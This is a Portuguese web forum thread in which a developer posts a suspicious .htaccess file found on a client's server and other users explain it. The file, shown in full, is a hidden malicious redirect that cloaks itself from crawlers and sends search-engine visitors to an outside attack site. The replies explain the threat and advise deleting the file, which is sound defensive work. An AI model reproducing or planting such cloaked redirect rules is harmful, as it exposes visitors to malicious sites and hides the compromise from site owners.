[Resolvido] O que esse .htaccess é capaz de fazer?

[Francispansa 6]

Pessoal, boa tarde.

 

Hoje estava subindo alguns arquivos para o servidor do meu cliente, e notei que tinha um arquivo .htaccess lá, achei estranho e baixei ele para ver, segue o conteudo:

 

# exgocgkctswo
RewriteEngine On
RewriteCond %{REQUEST_METHOD}   ^GET$
RewriteCond %{HTTP_REFERER}     ^(http\:\/\/)?([^\/\?]*\.)?(google\.|yahoo\.|bing\.|msn\.|yandex\.|ask\.|excite\.|altavista\.|netscape\.|aol\.|hotbot\.|goto\.|infoseek\.|mamma\.|alltheweb\.|lycos\.|search\.|metacrawler\.|rambler\.|mail\.|dogpile\.|ya\.|\/search\?).*$   [NC]
RewriteCond %{HTTP_REFERER}     !^.*(q\=cache\:).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(bing|Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndication).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sNews|BeOS|BigBlogZoo).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatcher).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Bookmark|bot|CE\-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\shiptop).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Diagnostics|DTAAgent|ecto|EmeraldShield|endo|Evaal|Everest\-Vulcan).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|Fuck\sYou|Google).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda\-Search|HP\-UX).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|iPhone|IRIX|Jakarta|JetBrains).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(LinknSurf|Linux|LiveJournal|Lonopono|Lotus\-Notes|Lycos|Lynx|Mac\_PowerPC).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Mac\_PPC|Mac\s10|Mac\sOS|macDN|Macintosh|Mediapartners|Megite|MetaProducts).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Miva|Mobile|NetBSD|NetNewsWire|NetResearchServer|NewsAlloy|NewsFire).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nutch|ObjectSearch|Octora).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenIntelligenceData|oreilly).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(os\=Mac|P900i|panscient|perl|PlayStation|POE\-Component|PrivacyFinder).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(psycheclone|Python|retriever|Rojo|RSS|SBIder|Scooter|Seeker|Series\s60).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(SharpReader|SiteBar|Slurp|Snoopy|Soap\sClient|Socialmarks|Sphere\sScout).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(spider|sproose|Rambler|Straw|subscriber|SunOS|Surfer|Syndic8).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Syntryx|TargetYourNews|Technorati|Thunderbird|Twiceler|urllib|Validator).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Vienna|voyager|W3C|Wavefire|webcollage|Webmaster|WebPatrol|wget|Win\s9x).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Win16|Win95|Win98|Windows\s95|Windows\s98|Windows\sCE|Windows\sNT\s4).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(WinHTTP|WinNT4|WordPress|WWWeasel|wwwster|yacy|Yahoo).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg).*$   [NC]
RewriteCond %{HTTP_COOKIE}      !^.*xccgtswgokoe.*$
RewriteCond %{HTTPS}            ^off$
RewriteRule ^(.*)$   http://infernomag.com/cgi-bin/r.cgi?p=9004&i=033df6d5&j=320&m=aacf47c584e2cfbc08494cccb326b046&h=%{HTTP_HOST}&u=%{REQUEST_URI}&q=%{QUERY_STRING}&t=%{TIME}  [R=302,L,CO=xccgtswgokoe:1:%{HTTP_HOST}:10080:/:0:HttpOnly]
# exgocgkctswo

 

Então como ainda estou estudando sobre o assunto, gostaria de saber o que o código acima pode fazer, se pode prejudicar o servidor de alguma forma, deixar uma brecha para códigos maliciosos e por ai vai.

 

Se alguem puder me falar um pouco sobre o código acima eu fico grato.

 

Abrass

[quitZAUMMM 18]

Dê uma lida: http://goo.gl/QyoSv

 

[]s

[Bruno Augusto 417]

quitZAUMMM,era pra abrir alguma coisa? Aqui apareceu um menu e a página em branco.

 

Talvez seria algum tópico em específico desse site né?

 

Bem, mesmo que você seja novo no assunto é fácil de interpretar, desde que você seja programador e conheça alguns termos usados.

 

REQUEST_METHOD é a forma como a página está sendo requisitada (GET< POST, PUT, DELETE...)

HTTP_REFERER é a página onde o usuário estava antes de acessar o site que tiver esse arquivo com essas regras.

HTTP_USER_AGENT não sei explicar direito o que seria, mas eu vejo ele como uma identificação do browser ou do mecanismo de acesso que está acessando o site.

HTTP_COOKIE acredito ser a presença de um cookie, mas não estou certo disso.

HTTPS, talvez seja a presença do certificado de segurança. Também não estou certo.

 

Enfim...

 

Veja que todas as entradas tem uma Expressão Regular na frente e que TODAS, exceto REQUEST_METHOD, o primeiro HTTP_REFERER e HTTP inicial com um ! (exclamação) que, em programação, normalmente significa negação de algo.

 

Ou seja, se dado valor (esquerda) não corresponder com as regras (direita), será incluído na "lista-branca" para executar o RewriteRule logo no final.

 

Viu que eu destaquei um termo acima? Então, todas essas regras foram cuidadosamente desenvolvidas para não serem executadas por bots ou webcrawlers e sim, apenas por usuários "reais", de requisições legítimas, visando mascarar as atividades visto que, os responsáveis por tais bots tem mais poder e conhecimento para fazer algo contra o criador desse htaccess.

 

Não sei você, mas só por essa última frase, a coisa começou a feder, não? :P

 

Então, extraindo a porção fixa da URL presente em RewriteRule http://infernomag.com/cgi-bin/r.cgi?p=9004&i=033df6d5&j=320&m=aacf47c584e2cfbc08494cccb326b046 e acessando manualmente pelo Firefox, recebemos uma mensagem de Página avaliada como foco de ataques!

 

Resumindo! Alguém ou alguma coisa enxertou (pe com X mesmo?) esse htaccess no site do seu cliente, para direcionar todas as requisições para essa outra URL maliciosa.

 

Agora, das duas uma:

 

- Se o domínio do site do seu cliente NÃO É infernomag.com, delete esse arquivo imediatamente.

- Se for, esteja ciente que esse tópico estará sendo encaminhado à Administração do Fórum pois caracteriza, de certa, forma, propagação de informações prejudiciais a quem dela usufruem.

[quitZAUMMM 18]

kkk bom não sei pq apareceu a página assim, segue link certo: http://tutorial.uolhost.com.br/index.php?p=resposta&res=525#rmcl

 

[]s

[LCS 0]

Santa tragédia Batman.... kkk O Google serve para que mesmo??

[Francispansa 6]

Obrigado pelas respostas.. Bom eu tinha uma ideia do que o arquivo poderia fazer, mas queria confirmar aqui caso estivesse enganado e pudesse ser uma coisa muito pior do que eu imaginava.

 

Sobre a questão do dominio do meu cliente Bruno, não é infernomag.com, fique tranquilo..

Realmente postei o conteudo do arquivo aqui para saber mais sobre ele e como realmente poderia me prejudicar.

 

Bom, mais uma vez obrigado pelas respostas..

[quitZAUMMM 18]

Opa :thumbsup: